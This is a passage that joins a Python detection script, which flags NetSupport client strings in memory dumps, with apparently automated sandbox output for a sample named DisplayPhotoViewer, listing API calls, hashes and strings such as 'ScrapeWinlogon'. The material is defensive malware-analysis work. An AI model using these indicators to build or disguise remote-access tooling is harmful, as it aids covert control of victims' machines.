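    b"e:\\nsmsrc\\nsm\\": "build_path",          # source tree leak
    b"..\\CTL32\\NSMString.cpp": "build_path",    # assert() file name
    b"..\\ctl32\\util.cpp": "build_path",
    b"NSMCobrMain": "window_class",               # RegisterClassA name
    b"Check9xLogon - [bLoggedIn: %u] send command %d to connections": "trace",
    b"EnableAudioHook(%d, %d), gCount=%d": "trace",
    b"DisableRunplugin": "config",
    b"MMPlayerOnTop": "config",
}


def find_all(haystack: bytes, needle: bytes) -> list[int]:
    """All (possibly overlapping) offsets of needle in haystack."""
    offsets, start = [], 0
    while True:
        i = haystack.find(needle, start)
        if i < 0:
            return offsets
        offsets.append(i)
        start = i + 1


def scan(data: bytes) -> dict[bytes, list[int]]:
    """Return {indicator: [offsets]} for every indicator found.

    Each indicator is searched in its narrow form, as the report lists it,
    and (assumption) as a UTF-16LE copy in case a build stores it wide.
    """
    hits: dict[bytes, list[int]] = {}
    for needle in INDICATORS:
        offs = find_all(data, needle)
        offs += find_all(data, needle.decode("ascii").encode("utf-16-le"))
        if offs:
            hits[needle] = sorted(offs)
    return hits


def verdict(hits: dict[bytes, list[int]]) -> str:
    """Assumed rule: a build-path leak plus one other artifact category is
    treated as NetSupport client code; anything weaker is only a weak match."""
    cats = {INDICATORS[n] for n in hits}
    if "build_path" in cats and len(cats) >= 2:
        return "netsupport-client-code"
    if hits:
        return "weak-match"
    return "clean"


# Constructed sample buffers (not real dumps). The first imitates a slice of
# the dumped module's string table; the second holds only generic strings
# that legitimate software also carries and must not trigger.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"*this==src\x00..\\CTL32\\NSMString.cpp\x00IsA()\x00"
    + b"e:\\nsmsrc\\nsm\\1201\\1201f2\\ctl32\\NSMString.h\x00"
    + b"\x90" * 16
    + b"NSMCobrMain\x00Shell_TrayWnd\x00DisableRunplugin\x00Client\x00"
    + b"Check9xLogon - [bLoggedIn: %u] send command %d to connections\x00"
)
BENIGN_DUMP = b"Shell_TrayWnd\x00Client\x00kernel32.dll\x00GetUserDefaultUILanguage\x00"


if __name__ == "__main__":
    for name, buf in (("sample", SAMPLE_DUMP), ("benign", BENIGN_DUMP)):
        h = scan(buf)
        print(f"{name}: {verdict(h)}")
        for needle, offs in h.items():
            print(f"  {INDICATORS[needle]:13s} {needle!r} @ {offs}")
```

Run it against a real dump by replacing SAMPLE_DUMP with the bytes of the .sdmp file; the point of the category rule is that a lone NSMCobrMain or DisableRunplugin in some unrelated process is reported as a weak match, not as a detection, while the source-path leak plus any second artifact is hard to explain away.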
APIs
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: FreeString$__wcsicoll_memset
• String ID:
• API String ID: 3719176846-0
• Opcode ID: 1e066dc6a2c2fd3b8490b78c425d1fc150c0e70213a420b84c7e76dcbd66d9c4
• Instruction ID: 233b9c775c86b55ee17c32b0d06f93d69e5b4b07b1d21ebef60919d9052ea710
• Opcode Fuzzy Hash: 1e066dc6a2c2fd3b8490b78c425d1fc150c0e70213a420b84c7e76dcbd66d9c4
• Instruction Fuzzy Hash: F9A1DA75E046299FCB61CF59CC84ADAB7B9AF89304F2045D9E50DAB310DB31AE85CF50
APIs
• IsBadWritePtr.KERNEL32(?), ref: 10706D74
• IsBadWritePtr.KERNEL32(?,000041C4), ref: 10706DAD
• IsBadWritePtr.KERNEL32(?,00008000), ref: 10706E0D
Strings
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: Write
• String ID: $@
• API String ID: 3165279579-1077428164
• Opcode ID: f43a3dcf2f54acfc640fd8b9967bf3e9520b20585d24541290fc8f86682844a1
• Instruction ID: 00a7849858fe3d9b1527e8407fc5a1c654934172b944ca3fa64e6404c23ee695
• Opcode Fuzzy Hash: f43a3dcf2f54acfc640fd8b9967bf3e9520b20585d24541290fc8f86682844a1
• Instruction Fuzzy Hash: D5A16C70E0421ADBDB54CB58D890AADF3F1FF4A364F71836AE522A62D9D3709E41CB50
APIs
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 4048096073-0
• Opcode ID: 1c5e414202f660881287e92f0d7b6c526bb708caf1c3210ab8dd591ed19701e4
• Instruction ID: ee3ac379b69140bbf159f532ce0e90d4beceeac01acc18122968c740f6794ac6
• Opcode Fuzzy Hash: 1c5e414202f660881287e92f0d7b6c526bb708caf1c3210ab8dd591ed19701e4
• Instruction Fuzzy Hash: 8C51E630E00609EFDBC08FB5998469EFBB3FF423A4F108269E43596190E770AA50CF59
APIs
• GetStartupInfoA.KERNEL32(?), ref: 10709480
• GetFileType.KERNEL32(00000480), ref: 1070952B
• GetStdHandle.KERNEL32(-000000F6), ref: 1070958E
• GetFileType.KERNEL32(00000000), ref: 1070959C
• SetHandleCount.KERNEL32 ref: 107095D3
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: FileHandleType$CountInfoStartup
• String ID:
• API String ID: 1710529072-0
• Opcode ID: 540f23a83dea661e50f95216cafbd5bb8c5bdc0f9f6af70afa66a5e260f65166
• Instruction ID: fe3ba0319f7d85e962cc7c2cfbb6df120c3e9967a33f4c46026a810db297d098
• Opcode Fuzzy Hash: 540f23a83dea661e50f95216cafbd5bb8c5bdc0f9f6af70afa66a5e260f65166
• Instruction Fuzzy Hash: FF512371A04255DFC712CB38CC8865A7BE0EB1B364F26876CE5A6CB2E5D730D856C750
APIs
• EndPagePrinter.WINSPOOL.DRV(00000000), ref: 11061902
• EndDocPrinter.WINSPOOL.DRV(00000000), ref: 11061908
• ClosePrinter.WINSPOOL.DRV(00000000,00000000), ref: 1106190E
• CloseHandle.KERNEL32(00000000), ref: 11061916
• Sleep.KERNEL32(000001F4), ref: 1106194A
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Printer.$Close$HandlePageSleep
• String ID:
• API String ID: 2391129857-0
• Opcode ID: 3a3e017380ba76cd7ee2123f4a9f8e012680ae733483537db7516579aff359a9
• Instruction ID: 7531ab9e0973a1f7646a0806b5cca008d58d5e2e9b6a2bee3bfbf99ed1efb34d
• Opcode Fuzzy Hash: 3a3e017380ba76cd7ee2123f4a9f8e012680ae733483537db7516579aff359a9
• Instruction Fuzzy Hash: 1B416E35E00205EFEB41CF64CC80B9EBBF9AF89315F1485A9DD599B285D770A980CFA0
APIs
• CloseHandle.KERNEL32(00000000,110B2100,00000001,00000000,?), ref: 1103B1D2
  • Part of subcall function 110AEE90: InitializeCriticalSection.KERNEL32(0000002C,?,?,?,?,?,?,?,00000000,1117A1A6,000000FF), ref: 110AEF15
  • Part of subcall function 110AEE90: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,1117A1A6,000000FF), ref: 110AEF1F
  • Part of subcall function 110AEE90: GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,1117A1A6,000000FF), ref: 110AEF3A
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1103B23E
• CreateThread.KERNEL32(00000000,00002000,1111E680,?,00000000,218EC38C), ref: 1103B25A
• CloseHandle.KERNEL32(00000000), ref: 1103B261
• SetEvent.KERNEL32(?), ref: 1103B2A1
  • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
  • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
  • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CreateEvent$CloseHandle$CriticalInitializeSectionThreadVersion_malloc_memsetwsprintf
• String ID:
• API String ID: 1003535115-0
• Opcode ID: 48dcf68bbfe972259273c84229e7585fa66485648a2311e598ce3c405fa79fee
• Instruction ID: 59b7b7a8b8739afbf16cdefbc8fc6f7aac5884a9360f93b9abd0fb9c2e8306ac
• Opcode Fuzzy Hash: 48dcf68bbfe972259273c84229e7585fa66485648a2311e598ce3c405fa79fee
• Instruction Fuzzy Hash: A8418D70A10B05AFEB21DFA0CC88BAEB7E4FB84319F00462DE92697284DB757444CB50
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1108D01A
  • Part of subcall function 110C7250: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,11059DFB,?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C726B
  • Part of subcall function 110C7250: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C7298
  • Part of subcall function 110C7250: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C72AA
  • Part of subcall function 110C7250: LeaveCriticalSection.KERNEL32(?,?,?,?,11025293,00000000,?,?,00000000), ref: 110C72B4
• TranslateAcceleratorA.USER32(?,?,?,?,?,?,1108EA30,?,00000000,?,00000000), ref: 1108D047
• TranslateMessage.USER32(?), ref: 1108D051
• DispatchMessageA.USER32(?), ref: 1108D05B
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1108D06B
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Message$CriticalSectionSendTranslate$AcceleratorDispatchEnterLeave
• String ID:
• API String ID: 754905447-0
• Opcode ID: 9715f5ed4c2b1510851d0b39af16146f46c1d8d150cabc500fc657d2b3488801
• Instruction ID: 3fa10b9cd5e0152477ff404b9afb0882a77b0557918c3a19b2c786b3f540e03f
• Opcode Fuzzy Hash: 9715f5ed4c2b1510851d0b39af16146f46c1d8d150cabc500fc657d2b3488801
• Instruction Fuzzy Hash: DD017572E0031B67D720DAB59C81FAFB3BC9B84748F408568FA10D6185E765F4078B61
APIs
• GetLastError.KERNEL32(00000100,00000000,1070BBCA,1070BD62,00000100,00000000,1070C67D,00000000,00000000), ref: 107086F7
• TlsGetValue.KERNEL32 ref: 10708705
• SetLastError.KERNEL32(00000000), ref: 10708751
  • Part of subcall function 1070B81C: HeapAlloc.KERNEL32(00000008,1070871A,00000000,00000000,00000000,10710C28,000000FF,?,1070871A,00000001,00000074), ref: 1070B912
• TlsSetValue.KERNEL32(00000000), ref: 10708729
• GetCurrentThreadId.KERNEL32 ref: 1070873A
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: ErrorLastValue$AllocCurrentHeapThread
• String ID:
• API String ID: 2020098873-0
• Opcode ID: f031bc719a5da730e93987fed5af29b35020afa2972dc8a45414b80f4ee78bab
• Instruction ID: 591b1fbaed1325d30b304ccb4e142b7f90dc3051da1f312c7ab2d11032e75b83
• Opcode Fuzzy Hash: f031bc719a5da730e93987fed5af29b35020afa2972dc8a45414b80f4ee78bab
• Instruction Fuzzy Hash: B8F0F6356816319BC3621B70ACCD7493BD4EF0E7B1B268724F585D61E8CFB0880097D8
APIs
• DeleteCriticalSection.KERNEL32(00000000,?,?,107086C9,10705CC4,10705D1D,?,?,?), ref: 1070792F
  • Part of subcall function 10708490: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000040,10702706,?,10712290,?,0000005C), ref: 10708564
• DeleteCriticalSection.KERNEL32(?,?,107086C9,10705CC4,10705D1D,?,?,?), ref: 1070794A
• DeleteCriticalSection.KERNEL32 ref: 10707952
• DeleteCriticalSection.KERNEL32 ref: 1070795A
• DeleteCriticalSection.KERNEL32 ref: 10707962
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: CriticalDeleteSection$FreeHeap
• String ID:
• API String ID: 447823528-0
• Opcode ID: eaf239efc731e46a156c24aaa06acd0f5c0fed71225901f548c2ef4761281912
• Instruction ID: 70a24dfaf9f851c3e1ab83a93fb83a48309f5fa0f7f317504c9ae551007d002b
• Opcode Fuzzy Hash: eaf239efc731e46a156c24aaa06acd0f5c0fed71225901f548c2ef4761281912
• Instruction Fuzzy Hash: 1CF0E932D103E069CB603F5AAC98B49BAE4EA81360313827AE491570B48D307C80C9C0
APIs
Strings
• BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1110F41E
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CountTick$DeleteObject
• String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
• API String ID: 3011517232-3209293507
• Opcode ID: 2007a20dd36d17b756c5d28e38a9b50283d0281504c78063b5ad7e6fd666dfc9
• Instruction ID: 4b4fa7f79596387b8477c8d8e3ee3d3e33fb9f23529e92e7f8220badaaf45fe9
• Opcode Fuzzy Hash: 2007a20dd36d17b756c5d28e38a9b50283d0281504c78063b5ad7e6fd666dfc9
• Instruction Fuzzy Hash: 91417E71E00B468FD714CE79DD856AFF6E1FB84219F15892ED9AAD2240DB3465418F01
APIs
  • Part of subcall function 11083B10: _memset.LIBCMT ref: 11083B2F
  • Part of subcall function 11083B10: InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106C2D3,00000000,00000000,1117757E,000000FF), ref: 11083BA0
• _memset.LIBCMT ref: 1108372A
• _free.LIBCMT ref: 11083744
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: _memset$CriticalInitializeSection_free
• String ID: ..\CTL32\EncryptFuncs.cpp$pDES
• API String ID: 1034327355-4272885995
• Opcode ID: d8df8343139f9651ea179b102a598974dbd44d9f7f2bcb6fa37d555d27a18de6
• Instruction ID: 44db7cba715f5ec9e8743322f4f81ded1efcc4351456725902015c0230d16d5d
• Opcode Fuzzy Hash: d8df8343139f9651ea179b102a598974dbd44d9f7f2bcb6fa37d555d27a18de6
• Instruction Fuzzy Hash: C741C7B5E04119AFDB60CF54CC41FAEB7B9EB85718F004298E9186B380EF31BE548B91
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CountTick
• String ID: Stop reconn to %s
• API String ID: 536389180-2663412807
• Opcode ID: 7f93f5c60b66f6f66a655a38c164c4c0078e2809a5f1202980f7c73e012203d8
• Instruction ID: 784773a31f0ef76a8b28eeacbae10346687d68afcbf10ed29864b8d9cefc3371
• Opcode Fuzzy Hash: 7f93f5c60b66f6f66a655a38c164c4c0078e2809a5f1202980f7c73e012203d8
• Instruction Fuzzy Hash: A331A131F102058FD7A0CF78D980A6AB7F9AF89314F1046AAE85AD7384EB31E944CB50
APIs
  • Part of subcall function 10701940: GetModuleHandleA.KERNEL32(NSMTRACE,10701A57), ref: 1070195A
• wsprintfA.USER32 ref: 10701C5C
• wvsprintfA.USER32(?,?,00000000), ref: 10701C85
• OutputDebugStringA.KERNEL32(?), ref: 10701CFE
Strings
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: DebugHandleModuleOutputStringwsprintfwvsprintf
• String ID: %s:
• API String ID: 3634490179-4275611816
• Opcode ID: 4cac9b81bd97c159f535d9f53a1ddd87a8411de7201592205bc2e7c81cea786e
• Instruction ID: 3313042287398766bc32277e51c1707280b49e727fe6768d637da24004752149
• Opcode Fuzzy Hash: 4cac9b81bd97c159f535d9f53a1ddd87a8411de7201592205bc2e7c81cea786e
• Instruction Fuzzy Hash: 8131E1706005186BDB68CB78AC859BF77A9EB45361F004369FC26C75D0EFB0DE828B94
APIs
• getpeername.WSOCK32(?,00000000,00000000,218EC38C), ref: 110D13D0
  • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(111E0BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111E0BD0,00000000,000000FF,218EC38C,?,00000000,00000000,?,?,?,00000000,1117D21B), ref: 110D9983
  • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(11192F38,?,?,?,00000000,1117D21B,000000FF,?,110D7033,?,Invalid Server paramters), ref: 110D998A
• __CxxThrowException@8.LIBCMT ref: 110D13B2
  • Part of subcall function 11157E51: RaiseException.KERNEL32(?,?,111084C4,?,?,?,?,?,111084C4,?,111C0108), ref: 11157E93
• inet_ntoa.WSOCK32(00000003), ref: 110D140E
Strings
• GetRemoteIPAddress() the socket is not connected, xrefs: 110D1380
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DebugOutputString$ExceptionException@8RaiseThrowgetpeernameinet_ntoa
                                                                                                    • String ID: GetRemoteIPAddress() the socket is not connected
                                                                                                    • API String ID: 3033480062-2838338745
                                                                                                    • Opcode ID: f67a2a6aba349b74b1afe1bb0bd9f9733d485f8bd67ad0e118c7723ebce24d98
                                                                                                    • Instruction ID: c8312da9112e31ef072ffc0594c0c1194be21931e72dfc95a9bfdd79bf2858e7
                                                                                                    • Opcode Fuzzy Hash: f67a2a6aba349b74b1afe1bb0bd9f9733d485f8bd67ad0e118c7723ebce24d98
                                                                                                    • Instruction Fuzzy Hash: 2A416DB1D003599FDB14CFA8C884BEEFBB9FB08718F50466DE466A3241EB756548CB90
APIs
• _malloc.LIBCMT ref: 1113D768
  • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
  • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
  • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: AllocateErrorExitHeapLastMessageProcess_mallocwsprintf
• String ID: ..\CTL32\uuencode.c$VUUU$buf
• API String ID: 1213237569-523449816
• Opcode ID: 12d8ce96e331268cef7e9b1b489254698880e1240f9d2a92e173167033825bf1
• Instruction ID: 05387d3a0e98dca9ca3f3b6f4fecbbe6fc04c47979bb7c97398c77e30506bed9
• Opcode Fuzzy Hash: 12d8ce96e331268cef7e9b1b489254698880e1240f9d2a92e173167033825bf1
• Instruction Fuzzy Hash: CA217C362185C65BC7028F2D8C412C5FFE2AFC922D75CC095E4D98F346E572E515C791
APIs
• GetTickCount.KERNEL32 ref: 110479A6
• GetTickCount.KERNEL32 ref: 110479C8
  • Part of subcall function 1103B130: CloseHandle.KERNEL32(00000000,110B2100,00000001,00000000,?), ref: 1103B1D2
Strings
• ScrapeWinlogon(false), xrefs: 110479ED
• ScrapeWinlogon(true), mode=%x, flags=%x, xrefs: 11047983
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CountTick$CloseHandle
• String ID: ScrapeWinlogon(false)$ScrapeWinlogon(true), mode=%x, flags=%x
• API String ID: 3288320179-399146346
